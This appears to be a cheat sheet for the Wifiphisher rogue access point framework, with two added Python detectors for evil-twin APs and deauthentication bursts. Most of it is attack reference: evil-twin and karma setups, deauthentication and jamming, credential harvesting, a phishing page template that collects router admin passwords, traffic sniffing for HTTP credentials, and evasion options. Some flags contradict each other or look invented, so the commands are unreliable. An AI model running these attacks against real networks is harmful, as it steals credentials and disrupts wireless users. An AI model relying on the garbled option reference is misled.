# Wifiphisher Wireless Phishing Framework Cheat Sheet
## Overview
Wifiphisher is a rogue access point framework for conducting red team engagements or Wi-Fi security testing. It creates fake wireless networks to run automated phishing attacks against wireless clients, capture credentials, and perform man-in-the-middle attacks.

Warning: This tool is intended for authorized penetration testing and wireless security assessments only. Make sure you have proper authorization before using it in any environment.
## Installation
### Kali Linux
```bash
# Install from repositories
sudo apt update
sudo apt install wifiphisher
# Install additional dependencies
sudo apt install hostapd dnsmasq
```
### Ubuntu/Debian
```bash
# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq
# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
# Install Python dependencies
pip3 install -r requirements.txt
# Install Wifiphisher
sudo python3 setup.py install
```
### Manual Installation
```bash
# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev
# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install
```
### Docker Installation
```bash
# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .
# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher
```
## Basic Usage
### Simple Rogue AP Attack
```bash
# Basic attack with automatic target selection
sudo wifiphisher
# Attack specific network
sudo wifiphisher -t "Target_Network"
# Use specific interface
sudo wifiphisher -i wlan0
# Use custom template
sudo wifiphisher -p firmware-upgrade
```
### Interface Management
```bash
# List available interfaces
sudo wifiphisher --list-interfaces
# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1
# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon
```
## Command Reference
### Basic Options
| Option | Description |
|---|---|
| `-t, --target` | Target network ESSID |
| `-i, --interface` | Wireless interface |
| `-jI, --jam-interface` | Interface for jamming |
| `-p, --phishing-scenario` | Phishing template |
| `-pK, --presharedkey` | WPA/WPA2 pre-shared key |
| `-qS, --quitonsuccess` | Quit on credential capture |
### Advanced Options
| Option | Description |
|---|---|
| `-aI, --apinterface` | AP interface |
| `-nJ, --nojamming` | Disable jamming |
| `-e, --essid` | Access Point ESSID |
| `-dE, --deauth-essid` | Deauth specific ESSID |
| `-dC, --deauth-channels` | Deauth channels |
| `-nE, --noextensions` | Disable extensions |
### Logging Options
| Option | Description |
|---|---|
| `-l, --logging` | Enable logging |
| `-lP, --log-path` | Log file path |
| `-cP, --credential-log-path` | Credential log path |
| `-lC, --log-credentials` | Log captured credentials |
## Phishing Templates
### Available Templates
```bash
# List available templates
sudo wifiphisher --list-phishing-scenarios
# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager
```
### Firmware Upgrade Template
```bash
# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"
# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process
```
### OAuth Login Template
```bash
# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"
# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service
```
### Custom Template Creation
```text
# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/
```
### Template Configuration (config.ini)
```ini
[info]
Name = Custom Template
Description = Custom phishing template
Language = en
[context]
# Template-specific settings
ESSID = {ESSID}
MAC = {MAC}
CHANNEL = {CHANNEL}
```
## Advanced Attacks
### Evil Twin Attack
```bash
# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade
# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55
# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6
```
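On the defending side, an evil twin shows up in beacon data as a managed ESSID advertised by a BSSID outside the inventory, with weaker security, or as a known BSSID appearing on a channel it was never assigned. The following is an added example, not part of the original cheat sheet or of Wifiphisher; the inventory layout, the record fields and all sample values are constructed assumptions.

```python
# Added example: flag likely evil-twin access points in a beacon inventory.
# All ESSIDs, BSSIDs and readings below are constructed sample data.

# Authorised APs per ESSID: BSSID -> (channel, security)
AUTHORISED = {
    "Corporate_WiFi": {
        "aa:bb:cc:00:00:01": (1, "WPA2"),
        "aa:bb:cc:00:00:02": (11, "WPA2"),
    },
}

# Beacon observations: (essid, bssid, channel, security)
OBSERVED = [
    ("Corporate_WiFi", "aa:bb:cc:00:00:01", 1, "WPA2"),   # legitimate
    ("Corporate_WiFi", "AA:BB:CC:00:00:02", 11, "WPA2"),  # legitimate, upper-case MAC
    ("Corporate_WiFi", "00:11:22:33:44:55", 6, "OPEN"),   # unknown BSSID, open network
    ("Corporate_WiFi", "aa:bb:cc:00:00:01", 6, "WPA2"),   # known BSSID on another channel
    ("Cafe_Guest", "de:ad:be:ef:00:01", 3, "OPEN"),       # ESSID we do not manage
]


def find_rogue_aps(observed, authorised):
    """Return (essid, bssid, reasons) for beacons that contradict the inventory."""
    findings = []
    for essid, bssid, channel, security in observed:
        known = authorised.get(essid)
        if known is None:
            continue  # only ESSIDs we manage can be judged against the inventory
        bssid = bssid.lower()
        reasons = []
        if bssid not in known:
            reasons.append("unknown-bssid")
            if security not in {sec for _, sec in known.values()}:
                reasons.append("security-mismatch")
        else:
            expected_channel, expected_security = known[bssid]
            if channel != expected_channel:
                reasons.append("channel-mismatch")  # same MAC elsewhere: possible clone
            if security != expected_security:
                reasons.append("security-mismatch")
        if reasons:
            findings.append((essid, bssid, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for essid, bssid, reasons in find_rogue_aps(OBSERVED, AUTHORISED):
        print(f"ALERT {essid} {bssid}: {', '.join(reasons)}")
```

The channel check assumes a fixed channel plan; where APs select channels automatically, treat `channel-mismatch` as a lead to investigate rather than proof.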
### Captive Portal Attack
```bash
# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect
# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login
# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect
```
### WPA/WPA2 Handshake Capture
```bash
# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture
# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/
```
### Karma Attack
```bash
# Respond to all probe requests
sudo wifiphisher --karma
# Karma with specific template
sudo wifiphisher --karma -p oauth-login
# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt
```
## Jamming and Deauthentication
### Targeted Deauthentication
```bash
# Deauth specific network
sudo wifiphisher -dE "Target_Network"
# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55
# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11
```
### Jamming Configuration
```bash
# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1
# Disable jamming
sudo wifiphisher -nJ
# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11
```
### Smart Jamming
```bash
# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming
# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5
```
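The deauthentication and jamming described in this section appear to a wireless sensor as bursts of deauth or disassociation frames attributed to one source within a short window. The following is an added example, not part of the original cheat sheet or of Wifiphisher; the record layout, the one-second window, the threshold of five and all frame data are constructed assumptions.

```python
# Added example: detect deauthentication/disassociation bursts in frame metadata.
# The frame records are constructed; the field layout is an assumption.
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"


def sample_frames():
    """Constructed capture summary: (timestamp_ms, subtype, source, destination)."""
    frames = [
        (3000, "deauth", "aa:bb:cc:00:00:02", "10:20:30:40:50:60"),    # isolated, normal
        (40000, "disassoc", "aa:bb:cc:00:00:02", "10:20:30:40:50:61"),  # isolated, normal
        (9000, "beacon", "aa:bb:cc:00:00:01", BROADCAST),               # ignored subtype
    ]
    # Eight broadcast deauths within 700 ms, all claiming one AP as their source
    frames += [(10000 + 100 * i, "deauth", "aa:bb:cc:00:00:01", BROADCAST) for i in range(8)]
    return frames


def deauth_bursts(frames, window_ms=1000, threshold=5):
    """Return {source: peak_count} for sources reaching `threshold` frames per window."""
    times_by_source = defaultdict(list)
    for ts, subtype, source, _dest in frames:
        if subtype in ("deauth", "disassoc"):
            times_by_source[source.lower()].append(ts)
    alerts = {}
    for source, times in times_by_source.items():
        times.sort()
        start = peak = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window_ms:  # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[source] = peak
    return alerts


if __name__ == "__main__":
    for source, count in deauth_bursts(sample_frames()).items():
        print(f"ALERT deauth burst from {source}: {count} frames within 1 s")
```

Where clients and access points support 802.11w Protected Management Frames, enabling it lets clients reject forged deauthentication frames; the burst check remains useful for visibility.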
## Extensions and Plugins
### Available Extensions
```bash
# List available extensions
sudo wifiphisher --list-extensions
# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality
```
### Credential Harvester
```bash
# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester
# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log
```
### Handshake Capture Extension
```bash
# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture
# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/
```
### DNS Spoofing Extension
```bash
# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler
# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf
```
## Custom Template Development
### HTML Template Structure
```html
<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: {ESSID}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>
```
### CSS Styling
```css
/* style.css */
body {
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
}
.container {
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
input {
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
}
button {
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
}
```
### JavaScript Functionality
```javascript
// script.js
document.addEventListener('DOMContentLoaded', function() {
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) {
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;
        if (!username || !password) {
            e.preventDefault();
            alert('Please enter both username and password');
        }
    });
    // Simulate loading
    setTimeout(function() {
        document.querySelector('.container').style.opacity = '1';
    }, 500);
});
```
## Monitoring and Logging
### Real-Time Monitoring
```bash
# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l
# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v
# Monitor specific log file
tail -f /var/log/wifiphisher.log
```
### Credential Logging
```bash
# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log
# Monitor captured credentials
tail -f /tmp/credentials.log
# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log | cut -d'"' -f4
```
### Traffic Analysis
```bash
# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap
# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap
# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
```
## Evasion Techniques
### MAC Address Randomization
```bash
# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac
# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55
# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac
```
### Channel Hopping
```bash
# Use channel hopping
sudo wifiphisher --channel-hop
# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11
# Random channel selection
sudo wifiphisher --random-channel
```
### Timing Evasion
```bash
# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300
# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals
# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode
```
## Troubleshooting
### Interface Issues
```bash
# Check interface status
iwconfig
# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up
# Check for monitor mode support
sudo iw list | grep -A 10 "Supported interface modes"
# Kill conflicting processes
sudo airmon-ng check kill
```
### Permission Issues
```bash
# Check permissions
ls -la /usr/bin/wifiphisher
# Fix permissions
sudo chmod +x /usr/bin/wifiphisher
# Check sudo configuration
sudo visudo
```
### Dependency Issues
```bash
# Check Python dependencies
pip3 list | grep -E "(scapy|netfilterqueue|roguehostapd)"
# Reinstall dependencies
pip3 install --upgrade -r requirements.txt
# Check system packages
dpkg -l | grep -E "(hostapd|dnsmasq)"
```
### Network Issues
```bash
# Check network configuration
ip addr show
# Check routing table
ip route show
# Test internet connectivity
ping -c 4 8.8.8.8
# Check DNS resolution
nslookup google.com
```
## Legal and Ethical Considerations
### Authorization Requirements
- Always obtain written authorization
- Document scope and limitations
- Follow responsible disclosure
- Respect privacy and data protection laws
### Best Practices
- Use only for authorized testing
- Minimize impact on legitimate users
- Provide immediate feedback and education
- Secure captured data appropriately
- Follow industry standards and guidelines
## Resources
- [Wifiphisher GitHub Repository](https://github.com/wifiphisher/wifiphisher)
- Wifiphisher Documentation
- Wireless Security Testing Guide
- WiFi Penetration Testing
- Wireless Network Security
*This cheat sheet provides a comprehensive reference for using Wifiphisher. Always make sure you have proper authorization before performing wireless security assessments.*